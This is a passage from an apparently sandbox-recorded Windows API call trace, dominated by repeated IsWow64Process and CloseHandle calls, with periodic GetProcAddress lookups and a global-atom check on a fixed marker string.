	[0129.811] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.811] CloseHandle (hObject=0x2dc) returned 1
	[0129.811] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.811] CloseHandle (hObject=0x2dc) returned 1
	[0129.812] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.812] CloseHandle (hObject=0x2dc) returned 1
	[0129.812] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.812] CloseHandle (hObject=0x2dc) returned 1
	[0129.812] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.813] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.813] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.813] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.813] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.813] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.814] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.814] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.814] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.814] CloseHandle (hObject=0x2dc) returned 1
	[0129.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.814] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.814] CloseHandle (hObject=0x2dc) returned 1
	[0129.814] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.814] CloseHandle (hObject=0x2dc) returned 1
	[0129.815] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.815] CloseHandle (hObject=0x2dc) returned 1
	[0129.815] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.815] CloseHandle (hObject=0x2dc) returned 1
	[0129.815] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.815] CloseHandle (hObject=0x2dc) returned 1
	[0129.847] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.847] CloseHandle (hObject=0x2dc) returned 1
	[0129.847] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.847] CloseHandle (hObject=0x2dc) returned 1
	[0129.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.848] CloseHandle (hObject=0x2dc) returned 1
	[0129.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.848] CloseHandle (hObject=0x2dc) returned 1
	[0129.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.848] CloseHandle (hObject=0x2dc) returned 1
	[0129.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.848] CloseHandle (hObject=0x2dc) returned 1
	[0129.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.849] CloseHandle (hObject=0x2dc) returned 1
	[0129.849] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.849] CloseHandle (hObject=0x2dc) returned 1
	[0129.849] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.849] CloseHandle (hObject=0x2dc) returned 1
	[0129.849] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.849] CloseHandle (hObject=0x2dc) returned 1
	[0129.849] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.849] CloseHandle (hObject=0x2dc) returned 1
	[0129.850] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.850] CloseHandle (hObject=0x2dc) returned 1
	[0129.850] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.850] CloseHandle (hObject=0x2dc) returned 1
	[0129.850] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.850] CloseHandle (hObject=0x2dc) returned 1
	[0129.850] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.850] CloseHandle (hObject=0x2dc) returned 1
	[0129.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.851] CloseHandle (hObject=0x2dc) returned 1
	[0129.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.851] CloseHandle (hObject=0x2dc) returned 1
	[0129.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.851] CloseHandle (hObject=0x2dc) returned 1
	[0129.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.851] CloseHandle (hObject=0x2dc) returned 1
	[0129.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.851] CloseHandle (hObject=0x2dc) returned 1
	[0129.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.852] CloseHandle (hObject=0x2dc) returned 1
	[0129.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.852] CloseHandle (hObject=0x2dc) returned 1
	[0129.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.852] CloseHandle (hObject=0x2dc) returned 1
	[0129.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.852] CloseHandle (hObject=0x2dc) returned 1
	[0129.853] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.853] CloseHandle (hObject=0x2dc) returned 1
	[0129.853] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.853] CloseHandle (hObject=0x2dc) returned 1
	[0129.853] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.853] CloseHandle (hObject=0x2dc) returned 1
	[0129.853] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.853] CloseHandle (hObject=0x2dc) returned 1
	[0129.854] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.854] CloseHandle (hObject=0x2dc) returned 1
	[0129.854] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.854] CloseHandle (hObject=0x2dc) returned 1
	[0129.854] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.854] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0129.854] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0129.855] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.855] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0129.855] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0129.855] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0129.855] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0129.855] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0129.855] CloseHandle (hObject=0x2dc) returned 1
	[0129.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0129.856] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.856] CloseHandle (hObject=0x2dc) returned 1
	[0129.856] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.856] CloseHandle (hObject=0x2dc) returned 1
	[0129.856] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.856] CloseHandle (hObject=0x2dc) returned 1
	[0129.856] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.856] CloseHandle (hObject=0x2dc) returned 1
	[0129.857] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0129.857] CloseHandle (hObject=0x2dc) returned 1
	[0130.000] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.000] CloseHandle (hObject=0x2dc) returned 1
	[0130.000] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.000] CloseHandle (hObject=0x2dc) returned 1
	[0130.000] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.000] CloseHandle (hObject=0x2dc) returned 1
	[0130.000] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.000] CloseHandle (hObject=0x2dc) returned 1
	[0130.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.001] CloseHandle (hObject=0x2dc) returned 1
	[0130.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.001] CloseHandle (hObject=0x2dc) returned 1
	[0130.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.001] CloseHandle (hObject=0x2dc) returned 1
	[0130.001] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.001] CloseHandle (hObject=0x2dc) returned 1
	[0130.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.002] CloseHandle (hObject=0x2dc) returned 1
	[0130.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.002] CloseHandle (hObject=0x2dc) returned 1
	[0130.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.002] CloseHandle (hObject=0x2dc) returned 1
	[0130.002] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.002] CloseHandle (hObject=0x2dc) returned 1
	[0130.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.003] CloseHandle (hObject=0x2dc) returned 1
	[0130.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.003] CloseHandle (hObject=0x2dc) returned 1
	[0130.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.003] CloseHandle (hObject=0x2dc) returned 1
	[0130.003] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.003] CloseHandle (hObject=0x2dc) returned 1
	[0130.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.004] CloseHandle (hObject=0x2dc) returned 1
	[0130.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.004] CloseHandle (hObject=0x2dc) returned 1
	[0130.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.004] CloseHandle (hObject=0x2dc) returned 1
	[0130.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.004] CloseHandle (hObject=0x2dc) returned 1
	[0130.004] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.004] CloseHandle (hObject=0x2dc) returned 1
	[0130.005] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.005] CloseHandle (hObject=0x2dc) returned 1
	[0130.005] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.005] CloseHandle (hObject=0x2dc) returned 1
	[0130.005] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.005] CloseHandle (hObject=0x2dc) returned 1
	[0130.005] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.005] CloseHandle (hObject=0x2dc) returned 1
	[0130.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.006] CloseHandle (hObject=0x2dc) returned 1
	[0130.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.006] CloseHandle (hObject=0x2dc) returned 1
	[0130.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.006] CloseHandle (hObject=0x2dc) returned 1
	[0130.006] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.006] CloseHandle (hObject=0x2dc) returned 1
	[0130.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.007] CloseHandle (hObject=0x2dc) returned 1
	[0130.007] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.007] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.007] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.008] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.008] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.008] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.008] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.008] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.008] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.009] CloseHandle (hObject=0x2dc) returned 1
	[0130.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.009] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.009] CloseHandle (hObject=0x2dc) returned 1
	[0130.009] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.009] CloseHandle (hObject=0x2dc) returned 1
	[0130.009] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.009] CloseHandle (hObject=0x2dc) returned 1
	[0130.010] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.010] CloseHandle (hObject=0x2dc) returned 1
	[0130.010] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.010] CloseHandle (hObject=0x2dc) returned 1
	[0130.043] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.043] CloseHandle (hObject=0x2dc) returned 1
	[0130.043] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.043] CloseHandle (hObject=0x2dc) returned 1
	[0130.044] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.044] CloseHandle (hObject=0x2dc) returned 1
	[0130.044] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.044] CloseHandle (hObject=0x2dc) returned 1
	[0130.044] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.044] CloseHandle (hObject=0x2dc) returned 1
	[0130.044] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.044] CloseHandle (hObject=0x2dc) returned 1
	[0130.044] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.045] CloseHandle (hObject=0x2dc) returned 1
	[0130.045] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.045] CloseHandle (hObject=0x2dc) returned 1
	[0130.045] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.045] CloseHandle (hObject=0x2dc) returned 1
	[0130.045] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.045] CloseHandle (hObject=0x2dc) returned 1
	[0130.045] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.045] CloseHandle (hObject=0x2dc) returned 1
	[0130.046] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.046] CloseHandle (hObject=0x2dc) returned 1
	[0130.046] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.046] CloseHandle (hObject=0x2dc) returned 1
	[0130.046] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.046] CloseHandle (hObject=0x2dc) returned 1
	[0130.046] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.046] CloseHandle (hObject=0x2dc) returned 1
	[0130.047] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.047] CloseHandle (hObject=0x2dc) returned 1
	[0130.047] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.047] CloseHandle (hObject=0x2dc) returned 1
	[0130.047] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.047] CloseHandle (hObject=0x2dc) returned 1
	[0130.047] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.047] CloseHandle (hObject=0x2dc) returned 1
	[0130.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.048] CloseHandle (hObject=0x2dc) returned 1
	[0130.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.048] CloseHandle (hObject=0x2dc) returned 1
	[0130.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.048] CloseHandle (hObject=0x2dc) returned 1
	[0130.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.048] CloseHandle (hObject=0x2dc) returned 1
	[0130.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.048] CloseHandle (hObject=0x2dc) returned 1
	[0130.049] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.049] CloseHandle (hObject=0x2dc) returned 1
	[0130.049] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.049] CloseHandle (hObject=0x2dc) returned 1
	[0130.049] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.049] CloseHandle (hObject=0x2dc) returned 1
	[0130.049] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.049] CloseHandle (hObject=0x2dc) returned 1
	[0130.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.050] CloseHandle (hObject=0x2dc) returned 1
	[0130.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.050] CloseHandle (hObject=0x2dc) returned 1
	[0130.050] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.051] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.051] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.051] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.052] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.052] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.052] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.052] CloseHandle (hObject=0x2dc) returned 1
	[0130.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.052] CloseHandle (hObject=0x2dc) returned 1
	[0130.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.052] CloseHandle (hObject=0x2dc) returned 1
	[0130.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.053] CloseHandle (hObject=0x2dc) returned 1
	[0130.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.053] CloseHandle (hObject=0x2dc) returned 1
	[0130.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.053] CloseHandle (hObject=0x2dc) returned 1
	[0130.085] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.085] CloseHandle (hObject=0x2dc) returned 1
	[0130.085] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.086] CloseHandle (hObject=0x2dc) returned 1
	[0130.086] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.086] CloseHandle (hObject=0x2dc) returned 1
	[0130.086] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.086] CloseHandle (hObject=0x2dc) returned 1
	[0130.086] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.086] CloseHandle (hObject=0x2dc) returned 1
	[0130.086] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.086] CloseHandle (hObject=0x2dc) returned 1
	[0130.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.087] CloseHandle (hObject=0x2dc) returned 1
	[0130.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.087] CloseHandle (hObject=0x2dc) returned 1
	[0130.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.087] CloseHandle (hObject=0x2dc) returned 1
	[0130.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.087] CloseHandle (hObject=0x2dc) returned 1
	[0130.088] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.088] CloseHandle (hObject=0x2dc) returned 1
	[0130.088] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.088] CloseHandle (hObject=0x2dc) returned 1
	[0130.088] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.088] CloseHandle (hObject=0x2dc) returned 1
	[0130.088] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.088] CloseHandle (hObject=0x2dc) returned 1
	[0130.089] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.089] CloseHandle (hObject=0x2dc) returned 1
	[0130.089] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.089] CloseHandle (hObject=0x2dc) returned 1
	[0130.089] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.089] CloseHandle (hObject=0x2dc) returned 1
	[0130.089] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.089] CloseHandle (hObject=0x2dc) returned 1
	[0130.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.090] CloseHandle (hObject=0x2dc) returned 1
	[0130.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.090] CloseHandle (hObject=0x2dc) returned 1
	[0130.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.090] CloseHandle (hObject=0x2dc) returned 1
